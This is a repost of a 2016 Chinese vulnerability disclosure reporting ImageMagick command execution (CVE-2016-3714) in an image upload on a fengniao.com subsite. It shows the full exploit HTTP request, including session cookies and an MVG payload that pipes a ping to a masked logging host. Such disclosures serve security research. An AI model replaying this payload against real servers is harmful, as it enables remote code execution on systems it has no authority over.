HanDs
NO.2

[7月漏洞公开] 蜂鸟网某站另一处远程命令执行 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

详细说明:

目标:http://yin.fengniao.com/?do=Create/Calendar&type=2#4020

检测发现蜂鸟印制作上传图片处存在CVE-2016-3714 - ImageMagick 命令执行

code 区域
POST http://yin.fengniao.com/?do=Ajax/Calendar&a=fileUpload&productId=2&productionId=4020 HTTP/1.1
Host: yin.fengniao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://yin.fengniao.com/?do=Create/Calendar&type=2
Content-Length: 310
Content-Type: multipart/form-data; boundary=---------------------------12092260437882
Cookie: ip_ck=4M+J5vr3j7QuNzg4MTAwLjE0NjQ3NDU0MTU%3D; lv=1464745417; vn=1; Hm_lvt_916ddc034db3aa7261c5d56a3001e7c5=1464745423; Hm_lpvt_916ddc034db3aa7261c5d56a3001e7c5=1464746474; bbuserid=10297207; bbpassword=3f2646d82d71bf1076da85217a3f7d8c; bbusername=123321aabb; message_str_10297207=0%7C0%7C0%7C38; 9a483e1e1124621acbda816b30abe30f=3u7g7o2k4dv35jg%7B%7BZ%7D%7D%25E4%25B8%258A%25E4%25BC%25A0%25E7%2585%25A7%25E7%2589%2587%7B%7BZ%7D%7Dnull; MyZClick_9a483e1e1124621acbda816b30abe30f=/html/body/div%5B2%5D/div%5B2%5D/div/a/
Connection: keep-alive

-----------------------------12092260437882
Content-Disposition: form-data; name="fileData[]"; filename="3.png"
Content-Type: image/png

push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 '|ping fengniao.xxx.xxx'
pop graphic-context
-----------------------------12092260437882--

漏洞证明:

仅以cloudeye为证,具体就不深入了

QQ截图20160601101713.jpg

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
蜂鸟 远程 命令 执行
#1楼
发帖时间:2016-7-16   |   查看数:0   |   回复数:0
游客组